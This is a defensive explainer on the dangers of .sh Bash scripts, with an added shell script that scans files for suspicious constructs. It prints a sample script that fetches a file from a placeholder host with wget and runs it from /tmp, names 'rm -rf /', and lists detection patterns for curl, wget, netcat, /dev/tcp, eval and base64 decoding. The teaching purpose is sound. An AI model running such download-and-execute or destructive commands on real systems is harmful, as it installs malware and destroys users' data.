Is a .sh File Dangerous?

TL;DR

Yes, a .sh file (Bash script) can absolutely be malware. It’s code that your computer will run, and if it’s written maliciously, it can do serious harm. Treat them with the same caution as any other executable file.

What is a .sh File?

A .sh file is a Bash script – a plain text file containing commands that are interpreted by the Bash shell (a common command interpreter on Linux and macOS). They’re used for automating tasks, but can also be used to run harmful code.

Why .sh Files Can Be Dangerous

Because a script is simply a list of commands that the shell runs with your user's privileges, a .sh file can:

  • Delete files: A script could wipe important data.
  • Install malware: It could download and run other malicious software.
  • Steal information: Scripts can be written to send your passwords, browsing history, or other sensitive data to attackers.
  • Take control of your system: In severe cases, a script could give an attacker remote access to your computer.

How to Check if a .sh File is Safe

  1. Source: The most important thing! Where did the file come from? Only run scripts from sources you completely trust. If it’s emailed to you, or on a website you don’t know well, be very careful.
  2. Examine the Code: Open the .sh file in a text editor (like Notepad on Windows, TextEdit on macOS, or nano/vim on Linux). Read the code! Look for anything suspicious.
    • Obfuscated code: If the script is deliberately hard to read (lots of strange characters or encoding), that’s a red flag.
    • Downloads: Commands like wget or curl download files from the internet – be wary if you don’t know what they are downloading.
    • Network connections: Commands like nc (netcat) can establish network connections, potentially sending data to an attacker.
    • Commands that modify system files: Look for commands like rm -rf / (extremely dangerous!), or anything modifying files in critical directories like /etc.
  3. Permissions Check (Linux/macOS): Use the ls -l command to check file permissions.
    ls -l suspicious_script.sh

    Look at the first ten characters. If it starts with -rwxr-xr-x, that means anyone can execute the script. If you don’t need to run it, change permissions:

    chmod -x suspicious_script.sh

  4. Run in a Sandbox: If you’re unsure, run the script in a virtual machine or sandbox environment (like Docker) to isolate it from your main system. This limits the harm it can do if it is malicious. Note that a container such as Docker shares the host kernel and isolates less than a full virtual machine, so for anything you genuinely distrust prefer a disposable VM with no access to your files, credentials, or network shares.
  5. Virus Scanning: While not always effective against sophisticated scripts, running a virus scan on the .sh file can sometimes detect known malware.

Example of Suspicious Code

This script downloads and executes a file from an unknown source:

#!/bin/bash
wget http://example.com/malware.sh -O /tmp/malware.sh
bash /tmp/malware.sh

Do not run this script! It’s a clear example of potentially malicious behaviour.
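The checklist above, applied to this sample, as an added example that is not part of the original article: a small POSIX shell triage script that reports the file's ten-character mode string from ls -l, flags the suspicious constructs named in the checklist (downloads, netcat-style network use, rm -rf /, decoding or eval, running something out of /tmp, writes to /etc), and strips the execute bits while the file is under review. The function names, the indicator patterns, and the two sample scripts it writes to a temporary directory are this example's own constructions, not a standard tool.

```shell
#!/bin/sh
# Added example (not from the original article): static triage of a .sh file
# before deciding whether to run it. Function names and indicator patterns
# are this example's own choices, not a recognised standard.

# Checklist step 3: the first ten characters of ls -l (e.g. -rwxr-xr-x).
mode_string() {
    ls -l "$1" | cut -c1-10
}

# Returns 0 if any execute bit is set for owner, group or other.
is_executable_by_anyone() {
    case "$(mode_string "$1")" in
        *x*) return 0 ;;
        *)   return 1 ;;
    esac
}

# Checklist step 3 follow-up: remove all execute bits while the file is under review.
remove_execute_bits() {
    chmod -x "$1"
}

# Checklist step 2: list suspicious constructs, one per line, prefixed with a
# category label. grep -n prints "line:content"; no match prints nothing.
find_indicators() {
    f="$1"
    grep -nE '(^|[^[:alnum:]])(wget|curl)[[:space:]]' "$f" | sed 's/^/download: /'
    grep -nE '(^|[^[:alnum:]])nc[[:space:]]|/dev/tcp/' "$f" | sed 's/^/network: /'
    grep -nE 'rm[[:space:]]+-rf[[:space:]]+/([[:space:]]|$)' "$f" | sed 's/^/destructive: /'
    grep -nE 'base64[[:space:]]+(-d|--decode)|(^|[[:space:]])eval[[:space:]]' "$f" | sed 's/^/obfuscation: /'
    grep -nE '(^|[[:space:]])(bash|sh)[[:space:]]+/tmp/' "$f" | sed 's/^/exec-from-tmp: /'
    grep -nE '>[[:space:]]*/etc/' "$f" | sed 's/^/system-files: /'
}

# Number of indicator lines found (0 means nothing on the list was spotted).
count_indicators() {
    find_indicators "$1" | wc -l | tr -d ' '
}

# Constructed sample inputs: the article's download-and-run script and a
# harmless backup script, written to a temporary directory.
WORK="$(mktemp -d)"
SUSPICIOUS="$WORK/suspicious_script.sh"
BENIGN="$WORK/backup.sh"

cat > "$SUSPICIOUS" <<'EOF'
#!/bin/bash
wget http://example.com/malware.sh -O /tmp/malware.sh
bash /tmp/malware.sh
EOF

cat > "$BENIGN" <<'EOF'
#!/bin/bash
tar -czf "$HOME/backup-$(date +%F).tar.gz" "$HOME/Documents"
EOF

chmod 755 "$SUSPICIOUS"   # -rwxr-xr-x, the case the permissions step describes
chmod 644 "$BENIGN"       # not executable by anyone

# Report on both samples. The suspicious script should show two indicators
# (a download and execution out of /tmp); the backup script should show none.
for script in "$SUSPICIOUS" "$BENIGN"; do
    echo "== $script  mode=$(mode_string "$script")"
    if is_executable_by_anyone "$script"; then
        echo "executable by someone: yes"
    else
        echo "executable by someone: no"
    fi
    find_indicators "$script"
    echo "indicators found: $(count_indicators "$script")"
done
```

A zero count only means none of the listed constructs appeared; a deliberately obfuscated script can hide every one of them behind encoding or string concatenation, which is why the source of the file and a full read of the code still come first.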

What to Do If You Think You’ve Run Malware

  • Disconnect from the internet: Prevent further communication with attackers.
  • Run a full system scan: Use reputable antivirus software.
  • Reinstall your operating system: In severe cases, this may be the safest option to ensure complete removal of malware.